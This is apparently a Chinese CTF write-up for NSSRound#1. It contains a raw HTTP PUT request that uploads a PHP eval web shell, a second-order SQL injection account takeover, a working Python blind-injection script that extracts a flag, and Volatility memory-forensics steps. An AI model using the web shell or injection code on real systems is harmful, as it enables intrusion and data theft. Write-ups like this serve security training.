WEB
basic_check
发现允许PUT方法请求
PUT /shell.php HTTP/1.1
Host: 1.14.71.254:28848
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
<?php eval($_POST[1]);?>
写入一句话
rce即可
Basic]sql_by_sql
先注册,进去有个修改密码
可能是二次注入
修改密码处源码
<!-- update user set password='%s' where username='%s'; -->
重新注册一个admin--+
获得admin身份
在/query下查询
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2022/8/3 21:42
# @Author : ki10Moc
# @FileName: [NSSRound#1 Basic]sql_by_sql.py
# @Software: PyCharm
# Link: ki10.top
import requests
import string
str = string.ascii_letters + string.digits
url = "http://1.14.71.254:28697/query"
s = requests.session()
headers = {'Cookie': 'session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.YklOVg.Pz554uNEiaxxBCpP4pm7-G8iucg'}
if __name__ == "__main__":
name = ''
for i in range(0,100):
char = ''
for j in str:
#表+字段
#payload = "1 and substr((select sql from sqlite_master limit 1,1),{},1)='{}'".format(i, j)
#数据
payload = "1 and substr((select flag from flag limit 0,1),{},1)='{}'".format(i, j)
data = {"id": payload}
r = s.post(url=url, data=data, headers=headers)
#print(r.text)
if "exist" in r.text:
name += j
print (j, end='')
char = j
break
if char == '%':
break
MISC
cut_into_thirds
python vol.py -f ./cut_into_thirds.raw imageinfo
得到版本号
python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 pslist
这有个引人注意的进程
获取dump文件
python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 memdump -p 1164 -D ./
foremost分离得到part1
part1:3930653363343839PK?
直接dump目标文件
python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 procdump -p 1164 -D ./
并查找相关信息
strings ./executable.1164.exe
得到part2
part2:GRRGGYJNGQ4GKMBNMJRTONI=
最后查看用户信息得到part3
分别进行base16、32、64解密即可
2463
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
